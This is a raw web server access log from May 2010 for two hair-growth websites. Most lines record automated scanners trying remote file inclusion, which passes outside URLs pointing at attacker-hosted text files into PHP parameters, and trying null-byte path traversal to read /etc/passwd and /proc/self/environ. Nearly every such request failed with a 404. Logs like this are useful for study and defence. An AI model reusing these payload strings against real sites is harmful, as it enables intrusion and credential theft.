87.252.3.123 - - [17/May/2010:01:28:41 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
77.221.130.20 - - [17/May/2010:01:28:51 -0700] "GET ////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.20 - - [17/May/2010:01:28:51 -0700] "GET /logs/access_100125.log/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.20 - - [17/May/2010:01:28:51 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.20 - - [17/May/2010:01:29:33 -0700] "GET ////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.20 - - [17/May/2010:01:29:33 -0700] "GET /logs/access_100125.log/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.20 - - [17/May/2010:01:29:33 -0700] "GET /logs/////delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.245.21.109 - - [17/May/2010:01:31:32 -0700] "GET /logs/access_100405.log//index.php?option=com_glossary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.245.21.109 - - [17/May/2010:01:31:35 -0700] "GET /index.php?option=com_glossary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.245.21.109 - - [17/May/2010:01:31:36 -0700] "GET /logs//index.php?option=com_glossary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
91.214.44.233 - - [17/May/2010:01:31:54 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.freehairsecrets.com"
91.214.44.233 - - [17/May/2010:01:31:55 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.freehairsecrets.com"
85.17.137.64 - - [17/May/2010:01:38:58 -0700] "GET /logs/access_100419.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:40:24 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:40:24 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:40:24 -0700] "GET /logs/access_100301.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:40:29 -0700] "GET /logs/access_100301.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:40:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:40:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.17.137.64 - - [17/May/2010:01:42:30 -0700] "GET /logs/access_100419.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [17/May/2010:01:42:53 -0700] "GET /bbs/kr_shop.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
69.175.61.122 - - [17/May/2010:01:43:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
218.149.84.14 - - [17/May/2010:01:44:36 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:44:36 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:44:36 -0700] "GET /logs/access_100308.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:44:44 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:44:44 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.149.84.14 - - [17/May/2010:01:44:44 -0700] "GET /logs/access_100308.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://d32n.ucoz.org/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [17/May/2010:01:47:52 -0700] "GET /bbs/kr_shop.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
67.195.112.151 - - [17/May/2010:01:52:10 -0700] "GET /logs/access_100208.log HTTP/1.0" 200 3021819 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
69.175.61.122 - - [17/May/2010:01:54:11 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
69.175.61.122 - - [17/May/2010:01:54:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
69.175.61.122 - - [17/May/2010:01:54:11 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
92.86.116.166 - - [17/May/2010:01:55:49 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
92.86.116.166 - - [17/May/2010:01:55:49 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
205.134.238.142 - - [17/May/2010:02:00:34 -0700] "GET /index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
195.191.25.150 - - [17/May/2010:02:00:38 -0700] "GET /index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:03:29 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:03:29 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:03:29 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:03:30 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:03:30 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:03:31 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
76.12.147.249 - - [17/May/2010:02:04:08 -0700] "GET /index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
76.12.147.249 - - [17/May/2010:02:04:09 -0700] "GET /index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:04:26 -0700] "GET /logs/access_100510.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:04:32 -0700] "GET /logs/access_100510.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.112.114.164 - - [17/May/2010:02:05:01 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.112.114.164 - - [17/May/2010:02:05:01 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.112.114.164 - - [17/May/2010:02:05:02 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.112.114.164 - - [17/May/2010:02:05:03 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.112.114.164 - - [17/May/2010:02:05:03 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.112.114.164 - - [17/May/2010:02:05:03 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [17/May/2010:02:05:06 -0700] "GET /logs/access_100301.log//bbs/kr_shop.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.71.175 - - [17/May/2010:02:05:06 -0700] "GET /bbs/kr_shop.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.71.175 - - [17/May/2010:02:05:06 -0700] "GET /logs//bbs/kr_shop.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
76.12.147.249 - - [17/May/2010:02:08:11 -0700] "GET /logs/access.log//index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
76.12.147.249 - - [17/May/2010:02:08:11 -0700] "GET /index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
76.12.147.249 - - [17/May/2010:02:08:11 -0700] "GET /logs//index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
76.12.147.249 - - [17/May/2010:02:08:15 -0700] "GET /logs/access.log//index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
76.12.147.249 - - [17/May/2010:02:08:15 -0700] "GET /index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
76.12.147.249 - - [17/May/2010:02:08:15 -0700] "GET /logs//index.php?option=print_category&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.112.114.164 - - [17/May/2010:02:08:44 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.112.114.164 - - [17/May/2010:02:08:44 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.112.114.164 - - [17/May/2010:02:08:45 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [17/May/2010:02:09:02 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:09:02 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:09:06 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:09:07 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:09:17 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:09:18 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.112.114.164 - - [17/May/2010:02:09:21 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.112.114.164 - - [17/May/2010:02:09:21 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.112.114.164 - - [17/May/2010:02:09:21 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [17/May/2010:02:09:21 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [17/May/2010:02:09:24 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [17/May/2010:02:10:25 -0700] "GET /logs/access_100412.log//bbs/kr_shop.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
207.46.199.39 - - [17/May/2010:02:13:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.freehairsecrets.com"
207.46.199.39 - - [17/May/2010:02:14:50 -0700] "GET /Order.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.freehairsecrets.com"
62.140.23.192 - - [17/May/2010:02:17:13 -0700] "GET /appserv/main.php?appserv_root=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.192 - - [17/May/2010:02:17:13 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.192 - - [17/May/2010:02:17:13 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:02:26:31 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.235.107.147 - - [17/May/2010:02:30:55 -0700] "GET /freehairsecretsphp/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:02:31:47 -0700] "GET /logs/access_100315.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:02:31:48 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:02:31:48 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:34:20 -0700] "GET /logs//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:34:20 -0700] "GET /main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:34:20 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:34:30 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:37:36 -0700] "GET /main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:37:36 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:37:37 -0700] "GET /logs//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:02:38:00 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:02:43:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13567 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:02:46:36 -0700] "GET /main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:02:46:36 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:02:46:36 -0700] "GET /logs//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:02:46:54 -0700] "GET /logs//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:02:46:54 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:02:46:54 -0700] "GET /main.php?sayfa=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.140.23.192 - - [17/May/2010:02:49:56 -0700] "GET /appserv/main.php?appserv_root=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [17/May/2010:02:49:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.140.23.192 - - [17/May/2010:02:49:56 -0700] "GET /logs/access_100419.log%20%20//appserv/main.php?appserv_root=http://www.beijingteacher.net/test/fid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:02:53:58 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:02:53:58 -0700] "GET /logs/access_100510.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:02:53:59 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:02:54:29 -0700] "GET /logs/access_100510.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:02:54:29 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:02:54:29 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:02:56:06 -0700] "GET /logs/access_100426.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.227.221.228 - - [17/May/2010:02:57:53 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:02:57:53 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
216.227.221.228 - - [17/May/2010:02:57:53 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:02:57:53 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)" "growlonghairfast.com"
216.227.221.228 - - [17/May/2010:02:57:53 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "growlonghairfast.com"
216.227.218.240 - - [17/May/2010:02:57:53 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:02:57:59 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:02:57:59 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "growlonghairfast.com"
79.174.72.86 - - [17/May/2010:02:57:59 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "growlonghairfast.com"
